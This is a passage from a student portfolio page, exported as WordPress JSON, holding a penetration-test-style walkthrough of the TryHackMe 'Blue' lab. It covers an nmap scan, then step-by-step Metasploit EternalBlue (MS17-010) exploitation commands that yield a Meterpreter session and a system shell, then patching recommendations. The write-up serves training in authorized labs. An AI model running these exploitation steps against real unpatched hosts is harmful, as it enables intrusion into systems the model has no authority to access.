{"id":359,"date":"2025-11-17T17:05:17","date_gmt":"2025-11-17T17:05:17","guid":{"rendered":"https:\/\/sites.wp.odu.edu\/isaac-huston\/?page_id=359"},"modified":"2025-11-17T17:06:34","modified_gmt":"2025-11-17T17:06:34","slug":"tryhackme-blue-walk-through","status":"publish","type":"page","link":"https:\/\/sites.wp.odu.edu\/isaac-huston\/skills\/network-security-analysis\/tryhackme-blue-walk-through\/","title":{"rendered":"TryHackMe Blue Walk-through"},"content":{"rendered":"\n<p>Full Windows box analysis chaining enumeration, exploitation, and proof of concept. Demonstrates end to end analytical workflow and technical reporting.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Penetration Test Report: TryHackMe Blue\n\n## 1. Objective\n\nThe goal of this engagement was to assess the security posture of the TryHackMe \u201cBlue\u201d machine by identifying exposed services, validating known vulnerabilities, and gaining controlled access to the target. The focus was MS17-010 (EternalBlue), a critical SMB remote code execution flaw found in unpatched Windows 7 systems. This report documents reconnaissance, exploitation, and proof of compromise.\n\n---\n\n## 2. Target Information\n\n**Target Host:** Blue  \n**IP Address:** 10.10.201.254  \n**Operating System:** Windows 7 Professional SP1  \n**Domain:** WORKGROUP  \n**Hostname:** JON-PC  \n\n---\n\n## 3. Methodology\n\nThis assessment followed a simple penetration testing workflow:\n\n1. Recon  \n2. Enumeration  \n3. Vulnerability Identification  \n4. Exploitation  \n5. Post-Exploitation Validation  \n\nAll actions were completed within the authorized TryHackMe environment.\n\n---\n\n## 4. Recon and Enumeration\n\n### 4.1 Nmap Scan\n\n**Command:**\n```bash\nnmap -A 10.10.201.254\n```\n\n### Scan Summary\n\nNmap identified Windows 7 Professional SP1 with several open RPC ports and SMB. SMB signing was not required. 
The system profile matched known EternalBlue vulnerable hosts.\n\n### Open Ports\n\n| Port        | State | Service       | Notes                   |\n| ----------- | ----- | ------------- | ----------------------- |\n| 135\/tcp     | open  | msrpc         | Microsoft RPC           |\n| 139\/tcp     | open  | netbios-ssn   | NetBIOS session service |\n| 445\/tcp     | open  | microsoft-ds  | SMB on Windows 7 SP1    |\n| 3389\/tcp    | open  | ms-wbt-server | RDP with SSL            |\n| 49152-49160 | open  | msrpc         | High-range MSRPC ports  |\n\n### Host Information Extracted\n\n* OS: Windows 7 Professional SP1\n* SMB signing: Not required\n* Domain: WORKGROUP\n* Hostname: JON-PC\n* RDP certificate valid\n* System time leaked\n\n### Vulnerability Identified\n\n**MS17-010 EternalBlue** confirmed through OS version, SMB posture, and fingerprinting.\n\n---\n\n## 5. Exploitation\n\n### 5.1 Metasploit Module\n\n**Exploit Used:**\n`exploit\/windows\/smb\/ms17_010_eternalblue`\n\n### Steps Performed\n\n1. Start Metasploit\n\n   ```bash\n   msfconsole\n   ```\n\n2. Search and load the module\n\n   ```bash\n   search eternalblue\n   use 0\n   ```\n\n3. Select the correct target\n\n   ```bash\n   show targets\n   set TARGET 1\n   ```\n\n4. Set required options\n\n   ```bash\n   set RHOSTS 10.10.201.254\n   set LHOST &lt;attacker_IP&gt;\n   ```\n\n5. Run the exploit\n\n   ```bash\n   exploit\n   ```\n\nIf the first attempt does not work, rerun it. A WIN message indicates success.\n\n### 5.2 Post-Exploitation Access\n\nOnce the exploit succeeded, Metasploit opened a Meterpreter session.\n\nTo drop to a system shell:\n\n```bash\nshell\n```\n\nSuccessful access shows:\n\n```\nC:\\Windows\\system32&gt;\n```\n\nThis confirms full remote code execution.\n\n---\n\n## 6. 
Proof of Compromise\n\n* Successful EternalBlue exploitation\n* Meterpreter session established\n* System-level shell access gained\n* Direct file system interaction confirmed\n\nThis is full compromise of the target machine.\n\n---\n\n## 7. Impact Assessment\n\nCompromising MS17-010 gives an attacker the ability to:\n\n* Execute system-level code\n* Install persistence\n* Move laterally\n* Extract credentials\n* Disable defensive controls\n\nIn real environments this would be a critical threat.\n\n---\n\n## 8. Recommendations\n\n1. Apply Microsoft MS17-010 patch.\n2. Disable SMBv1 entirely.\n3. Enable SMB signing.\n4. Restrict SMB and RPC exposure at network boundaries.\n5. Upgrade unsupported operating systems like Windows 7.\n6. Implement regular vulnerability scanning and patch cycles.\n\n---\n\n## 9. Conclusion\n\nThe Blue machine is fully exploitable through the MS17-010 vulnerability. The attack path required minimal effort and resulted in complete system compromise. Proper patch management and SMB hardening would prevent this issue.\n\n---\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Full Windows box analysis chaining enumeration, exploitation, and proof of concept. 
Demonstrates end to end analytical workflow and technical reporting.<\/p>\n","protected":false},"author":30346,"featured_media":0,"parent":324,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/359"}],"collection":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/users\/30346"}],"replies":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/comments?post=359"}],"version-history":[{"count":2,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/359\/revisions"}],"predecessor-version":[{"id":361,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/359\/revisions\/361"}],"up":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/324"}],"wp:attachment":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/media?parent=359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}